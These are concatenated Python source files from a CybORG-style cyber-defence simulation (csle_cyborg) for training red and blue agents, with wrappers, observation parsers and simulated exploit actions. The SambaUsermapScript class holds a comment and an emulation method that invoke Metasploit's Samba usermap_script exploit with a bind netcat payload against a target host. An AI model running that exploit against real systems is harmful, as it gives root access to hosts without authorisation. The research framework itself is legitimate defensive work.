                         agent = agent
                         )

    def emu_execute(self,
                    session_handler,
                    *args,
                    **kwargs):
        vel_controller = session_handler.controller
        obs = Observation()
        obs.set_success(True)
        obs = vel_controller.get_latest_alerts(obs)
        return obs

    def parse(self, results: dict) -> Observation:
        """Parses the results of the execute action to create an observation"""
        obs = Observation()
        obs.set_success(True)

        if "message" not in results \
           or "A new process has been created." not in results["message"]:
            return obs

        # Process creation event case:
        event_data = results['event_data']
        obs.add_system_info(
            hostid='0',
            hostname=event_data['SubjectDomainName']
        )

        path = event_data['NewProcessName']
        name = path
        if '/' in path:
            path = path.rsplit('/', 1)[0] + '/'
            name = name.rsplit('/', 1)[1]
        elif '\\' in path:
            path = path.rsplit('\\', 1)[0] + '\\'
            name = name.rsplit('\\', 1)[1]

        obs.add_process(hostid='0', pid=event_data['ProcessId'])
        obs.add_process(
            hostid='0',
            pid=event_data['NewProcessId'],
            parent_pid=event_data['ProcessId'],
            process_name=name,
            username=event_data['SubjectUserName'],
            path=path
        )

        return obs



from gymnasium import Env
from csle_cyborg.agents.wrappers.base_wrapper import BaseWrapper
from csle_cyborg.agents.wrappers.open_ai_gym_wrapper import OpenAIGymWrapper
from csle_cyborg.agents.wrappers.blue_table_wrapper import BlueTableWrapper
from csle_cyborg.agents.wrappers.red_table_wrapper import RedTableWrapper
from csle_cyborg.agents.wrappers.enum_action_wrapper import EnumActionWrapper


class ChallengeWrapper(Env,BaseWrapper):
    def __init__(self, agent_name: str, env, agent=None,
            reward_threshold=None, max_steps = None):
        super().__init__(env, agent)
        self.agent_name = agent_name
        if agent_name.lower() == 'red':
            table_wrapper = RedTableWrapper
        elif agent_name.lower() == 'blue':
            table_wrapper = BlueTableWrapper
        else:
            raise ValueError('Invalid Agent Name')

        env = table_wrapper(env, output_mode='vector')
        env = EnumActionWrapper(env)
        env = OpenAIGymWrapper(agent_name=agent_name, env=env)

        self.env = env
        self.action_space = self.env.action_space
        self.observation_space = self.env.observation_space
        self.reward_threshold = reward_threshold
        self.max_steps = max_steps
        self.step_counter = None
        self.possible_actions = env.possible_actions

    def step(self,action=None):
        obs, reward, done, info = self.env.step(action=action)
        
        self.step_counter += 1
        if self.max_steps is not None and self.step_counter >= self.max_steps:
            done = True

        return obs, reward, done, info, info

    def reset(self):
        self.step_counter = 0
        return self.env.reset(), {}

    def get_attr(self,attribute:str):
        return self.env.get_attr(attribute)

    def get_observation(self, agent: str):
        return self.env.get_observation(agent)

    def get_agent_state(self,agent:str):
        return self.env.get_agent_state(agent)

    def get_action_space(self, agent=None) -> dict:
        return self.env.get_action_space(self.agent_name)

    def get_last_action(self,agent):
        return self.get_attr('get_last_action')(agent)

    def get_ip_map(self):
        return self.get_attr('get_ip_map')()

    def get_rewards(self):
        return self.get_attr('get_rewards')()

    def get_reward_breakdown(self, agent: str):
        return self.get_attr('get_reward_breakdown')(agent)




# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.agent_actions.agent_action import AgentAction


class ListSessions(AgentAction):
    """Get IDs of all active sessions for an agent. """

    def emu_execute(self, agent, *args, **kwargs) -> Observation:
        session_ids = agent.list_sessions()
        obs = Observation()
        obs.set_success(True)
        obs.add_key_value("session_ids", session_ids)
        return obs



# Copyright DST Group. Licensed under the MIT license.n
from csle_cyborg.shared.actions.shell_actions_folder.open_connection_folder.credential_access_folder.credential_access import (
    CredentialAccess)


class BruteForceAccess(CredentialAccess):
    def __init__(self, session, agent):
        super().__init__(session, agent)

    def sim_execute(self, state):
        pass



from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.action import Action
from csle_cyborg.simulator.session import VelociraptorServer
from csle_cyborg.simulator.state import State


class Monitor(Action):
    def __init__(self, session: int, agent: str):
        super().__init__()
        self.agent = agent
        self.session = session

    def sim_execute(self, state: State) -> Observation:
        obs = Observation(True)
        session: VelociraptorServer = state.sessions[self.agent][self.session]
        for child in session.children.values():
            for artifact in session.artifacts:
                if len(state.hosts[child.host].events[artifact]) > 0:
                    obs.add_system_info(hostid=child.host, **state.hosts[child.host].get_state())
                for event in state.hosts[child.host].events[artifact]:
                    if 'pid' in event:
                        session.add_sus_pids(hostname=child.host, pid=event['pid'])
                    obs.add_process(hostid=child.host, **event)
                state.hosts[child.host].events[artifact] = []
        return obs

    def __str__(self):
        return f"{self.__class__.__name__}"



# Copyright DST Group. Licensed under the MIT license.
from ipaddress import IPv4Address
from csle_cyborg.shared.actions.msf_actions_folder.remote_code_execution_folder.remote_code_execution import RemoteCodeExecution

# use msf module exploit/multi/samba/usermap_script, set RHOSTS to target
# could also change LHOST, LPORT and RPORT (default 139)
# gives root session
from csle_cyborg.simulator.session import SessionType
from csle_cyborg.shared.enums import ProcessType, ProcessVersion
from csle_cyborg.shared.observation import Observation


class SambaUsermapScript(RemoteCodeExecution):
    def __init__(self, ip_address: IPv4Address, session: int, agent: str):
        super().__init__(session=session, agent=agent)
        self.target = ip_address

    def sim_execute(self, state):
        obs = Observation()
        obs.set_success(False)
        if self.session not in state.sessions[self.agent]:
            return obs
        session = state.sessions[self.agent][self.session]

        if session.session_type != SessionType.MSF_SERVER or not session.active:
            return obs

        # find shared subnet of the two hosts
        server_session, server_interface = self.get_local_source_interface(local_session=session, remote_address=self.target)

        if server_interface is None:
            return obs

        server_address = server_interface.ip_address

        if self.target == IPv4Address("127.0.0.1"):
            target_host = server_session.host
        else:
            target_host = state.hosts[state.ip_addresses[self.target]]

        smb_proc = None
        for proc in target_host.processes:
            if proc.process_type == ProcessType.SMB:
                # TODO: In case of SMB that is not the right version, should SMB process be in the obs?
                smb_proc = proc
                break

        # Note that this exploit should actually work for all versions in the range Samba 3.0.20 - 3.0.25rc3
        if smb_proc is not None and smb_proc.version == ProcessVersion.SAMBA_3_0_20_DEB:
            obs.set_success(True)
            obs.add_interface_info(hostid="0", ip_address=server_address)
            obs.add_interface_info(hostid="1", ip_address=str(self.target))
            obs.add_process(hostid="1", local_address=str(self.target), local_port=139, status="open",
                            process_type="smb")

            root_user = None
            for u in state.hosts[state.ip_addresses[self.target]].users:
                if u.username == "root":
                    root_user = u

            target_host.add_process(name="sleep", ppid=1, path="/bin/", user=root_user)
            target_host.add_process(name="telnet", ppid=1, path="/usr/bin/", user=root_user)
            sh_proc = state.hosts[state.ip_addresses[self.target]].add_process(name="sh", ppid=1, path="/bin/", user=root_user)

            new_session = state.add_session(host=target_host.hostname, agent=self.agent,
                                            user="root", session_type="msf shell", parent=server_session)
            process = new_session.process
            process.name = "sh"
            process.ppid = sh_proc.pid
            process.path = sh_proc.path
            process.user = root_user

            local_port = target_host.get_ephemeral_port()
            new_connection = {"local_port": local_port,
                              "Application Protocol": "tcp",
                              "remote_address": server_address,
                              "remote_port": 4444,
                              "local_address": self.target
                              }
            process.connections.append(new_connection)

            target_host.add_process(name="telnet", ppid=1, path="/usr/bin/", user=root_user)
            remote_port = {"local_port": 4444,
                           "Application Protocol": "tcp",
                           "local_address": server_address,
                           "remote_address": self.target,
                           "remote_port": local_port
                           }

            server_session.process.connections.append(remote_port)

            obs.add_process(hostid="0", local_address=server_address, remote_address=str(self.target),
                            local_port=4444, remote_port=local_port)
            obs.add_process(hostid="1", local_address=str(self.target), remote_address=server_address,
                            local_port=local_port, remote_port=4444)
            obs.add_session_info(hostid="1", session_id=new_session.ident, session_type="msf shell", agent=self.agent)

        return obs

    def emu_execute(self, session_handler) -> Observation:
        obs = Observation()
        from csle_cyborg.CybORG import MSFSessionHandler
        if type(session_handler) is not MSFSessionHandler:
            obs.set_success(False)
            return obs
        output = session_handler.execute_exploit(exploit_name='multi/samba/usermap_script', payload='cmd/unix/bind_netcat',
                                         opts={'RHOSTS': str(self.target)})
        obs.add_raw_obs(output)
        obs.set_success(False)
        return obs


## The following code contains work of the United States Government and is not subject to domestic copyright protection under 17 USC § 105.
## Additionally, we waive copyright and related rights in the utilized code worldwide through the CC0 1.0 Universal public domain dedication.
"""
Pertaining to actions that establish a new session on a host by exploiting
a process on that host
"""
# pylint: disable=invalid-name
from ipaddress import IPv4Address
from random import random
from typing import Tuple, Optional
from abc import abstractmethod
from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.concrete_actions.concrete_action import ConcreteAction
from csle_cyborg.shared.actions.msf_actions_folder.msf_action import lo
from csle_cyborg.simulator.process import ProcessType, DecoyType
from csle_cyborg.shared.enums import OperatingSystemType
from csle_cyborg.simulator.host import Host
from csle_cyborg.simulator.process import Process
from csle_cyborg.simulator.session import Session
from csle_cyborg.simulator.state import State


class ExploitAction(ConcreteAction):
    """
    Base class for actions that establish a new session on a host by exploiting
    a process on that host
    """

    def __init__(self, session: int, agent: str, ip_address: IPv4Address, target_session: int):
        super().__init__(session, agent)
        self.state = None
        self.ip_address = ip_address
        self.target_session = target_session
        self.detection_rate = 0.95

    def _get_originating_ip(self, state, from_host, port) -> \
            Optional[Tuple[Host, Optional[IPv4Address]]]:
        originating_ip_address = None
        if self.ip_address == lo:
            target_host: Host = from_host
            originating_ip_address = self.ip_address
        else:
            target_host: Host = state.hosts[state.ip_addresses[self.ip_address]]
            ports = self.check_routable(
                [state.subnets[i.subnet] for i in from_host.interfaces
                 if i.ip_address != lo],
                [s for s in state.subnets.values() if self.ip_address in s.cidr])
            if ports is None or (port not in ports and 'all' not in ports):
                return None
            from_subnet, _to_subnet = ports[port] if port in ports else ports['all']
            # calculate the originating ip address
            for i in from_host.interfaces:
                if i.ip_address != lo and i.subnet == from_subnet:
                    originating_ip_address = i.ip_address

        return target_host, originating_ip_address

    def sim_exploit(self, state: State, port: int, process_type: str) -> Observation:
        """Attempts to exploit host, establishing a session on it"""
        self.state = state
        obs = Observation()
        if self.session not in state.sessions[self.agent]:
            obs.set_success(False)
            return obs
        session = state.sessions[self.agent][self.session]
        from_host = state.hosts[session.host]

        if not session.active:
            obs.set_success(False)
            return obs

        # determine which ports can communicate between which subnets
        res = self._get_originating_ip(state, from_host, port)
        if res is None:
            obs.set_success(False)
            return obs

        target_host, originating_ip_address = res

        # find out if smb or smtp or femitter is running
        vuln_proc = None
        for proc in target_host.processes:
            if proc.process_type == ProcessType.parse_string(process_type):
                for conn in proc.connections:
                    if 'local_port' in conn and conn['local_port'] == port:
                        vuln_proc = proc
                        target_host.events['NetworkConnections'].append(
                            {'local_address': self.ip_address,
                             'local_port': conn["local_port"],
                             'remote_address': originating_ip_address,
                             'remote_port': target_host.get_ephemeral_port()})
                        break
                if vuln_proc is not None:
                    break

        if vuln_proc is None:
            obs.set_success(False)
            return obs

        if self.test_exploit_works(target_host, vuln_proc):
            if bool(vuln_proc.decoy_type & DecoyType.EXPLOIT):
                obs.add_interface_info(ip_address=str(self.ip_address))
                obs.set_success(False)
                target_host.events['NetworkConnections'].append({'local_address': self.ip_address,
                                                                 'local_port': port,
                                                                 'remote_address': originating_ip_address})

            elif bool(vuln_proc.decoy_type & DecoyType.SANDBOXING_EXPLOIT):
                obs = self.__add_reverse_session(state=state, username=vuln_proc.user,
                                                 from_ip_address=originating_ip_address, target_host=target_host,
                                                 session=session, is_escalate_sandbox=True)

            else:
                obs = self.__add_reverse_session(state=state, username=vuln_proc.user,
                                                 from_ip_address=originating_ip_address, target_host=target_host,
                                                 session=session)
        else:
            obs.add_interface_info(ip_address=str(self.ip_address))
            obs.set_success(False)

        obs.add_process(hostid=str(self.ip_address), local_address=self.ip_address,
                        local_port=port, status="open",
                        process_type=process_type)

        return obs

    @abstractmethod
    def test_exploit_works(self, target_host: Host,
                           vuln_process: Process) -> bool:
        """
        check if OS and process information is correct for exploit to work.
        Return True if it will work given the vulnerable process vuln_process
        False otherwise
        """
        raise NotImplementedError

    def __add_reverse_session(self, *, state: State, username: str,
                              from_ip_address: IPv4Address, target_host: Host,
                              session: Session, is_escalate_sandbox: bool = False):
        """
        called when exploit is successful, establishes a new session on that host
        """
        if target_host.os_type == OperatingSystemType.WINDOWS:
            ext = 'exe'
            path = 'C:\\temp\\'
        elif target_host.os_type == OperatingSystemType.LINUX:
            ext = 'sh'
            path = '/tmp/'
        else:
            return Observation(False)
        obs = Observation()

        local_port = target_host.get_ephemeral_port()
        new_connection = {"local_port": local_port,
                          "Application Protocol": "tcp",
                          "remote_address": from_ip_address,
                          "remote_port": 4444,
                          "local_address": self.ip_address
                          }

        file = target_host.add_file(f'cmd.{ext}', path, username, 7, density=0.9, signed=False)
        proc = target_host.add_process(name=file.name, ppid=1, path=file.path, user=username)
        proc.connections.append(new_connection)
        new_session = state.add_session(host=target_host.hostname, agent=self.agent,
                                        user=username, session_type="red_reverse_shell", parent=self.session,
                                        process=proc.pid, is_escalate_sandbox=is_escalate_sandbox)
        if random() < self.detection_rate:
            target_host.events['NetworkConnections'].append({'local_address': self.ip_address,
                                                             'local_port': local_port,
                                                             'remote_address': from_ip_address,
                                                             'remote_port': 4444,
                                                             'pid': proc.pid})
        remote_port = {"local_port": 4444,
                       "Application Protocol": "tcp",
                       "local_address": from_ip_address,
                       "remote_address": self.ip_address,
                       "remote_port": local_port
                       }

        state.hosts[session.host].get_process(session.pid).connections.append(remote_port)
        obs.add_process(hostid=str(from_ip_address),
                        local_address=from_ip_address,
                        remote_address=str(self.ip_address),
                        local_port=4444,
                        remote_port=local_port,
                        process_type='reverse_session_handler')
        obs.add_process(hostid=str(self.ip_address),
                        local_address=str(self.ip_address),
                        remote_address=from_ip_address,
                        local_port=local_port,
                        remote_port=4444,
                        process_type='reverse_session')
        obs.add_session_info(hostid=str(self.ip_address),
                             session_id=new_session.ident,
                             session_type=new_session.session_type,
                             agent=self.agent)
        obs.add_system_info(hostid=str(self.ip_address), hostname=target_host.hostname,
                            os_type=target_host.os_type)
        obs.set_success(True)
        return obs



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.agent_actions.agent_action import AgentAction


class GetInitialAgentObservation(AgentAction):
    """Get the initial observation for an agent. """

    def emu_execute(self, agent, *args, **kwargs) -> Observation:
        return agent.init_observation



# Copyright DST Group. Licensed under the MIT license.

from csle_cyborg.shared.observation import Observation
from csle_cyborg.simulator.session import SessionType
from .velociraptor_artifact_action import VelociraptorArtifactAction


class GetProcessInfo(VelociraptorArtifactAction):
    """Get information about a process with process ID PID"""

    def __init__(self, session: int, agent: str, hostname: str, process: int):
        super().__init__(session=session,
                         hostname=hostname,
                         agent=agent,
                         artifact='Linux.Sys.Pslist',
                         env={},
                         flow_completion_wait_limit=90)
        self.pid = process

    def sim_execute(self, state):
        obs = Observation()
        obs.set_success(False)
        if self.session not in state.sessions[self.agent]:
            return obs
        session = state.sessions[self.agent][self.session]

        if session.session_type != SessionType.VELOCIRAPTOR_CLIENT:
            return obs

        process = None
        for p in session.host.processes:
            if p.pid == self.pid:
                process = p
                break

        if process is None:
            return obs

        obs.set_success(True)
        obs.add_process(
            hostid="0",
            pid=process.pid,
            parent_pid=process.ppid,
            path=process.path,
            process_name=process.name,
            username=process.user.username
        )
        obs.add_user_info(hostid="0", username=process.user.username)

        return obs

    def parse(self, results: list, client_id: str) -> Observation:
        """Parses the results of the execute action to create an observation

        See GetProcessList.parse() for description of results format.
        """
        obs = Observation()
        obs.set_success(False)

        for p in results:
            if p["Pid"] != self.pid:
                continue

            obs.set_success(True)
            obs.add_user_info(hostid=client_id, username=p['Username'])

            path = p['Exe']
            if '/' in path:
                path = path.rsplit('/', 1)[0] + '/'
            elif '\\' in path:
                path = path.rsplit('\\', 1)[0] + '\\'

            obs.add_process(
                hostid=client_id,
                pid=p['Pid'],
                parent_pid=p['Ppid'],
                process_name=p['Name'],
                username=p['Username'],
                path=path
            )
            break

        return obs



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.simulator.entity import Entity
from ipaddress import IPv4Network


class Subnet(Entity):
    def __init__(self, cidr: IPv4Network = None, ip_addresses: list = None, nacls: dict = None, name: str = None):
        super().__init__()
        self.cidr = cidr
        self.ip_addresses = ip_addresses
        self.nacls = nacls
        self.name = name

    def get_state(self):  # TODO
        pass

    def contains_ip_address(self, ip_address: str) -> bool:
        # returns true if the specified ip address is in the subnet
        return ip_address in self.cidr

    def __str__(self):
        return str(self.cidr)
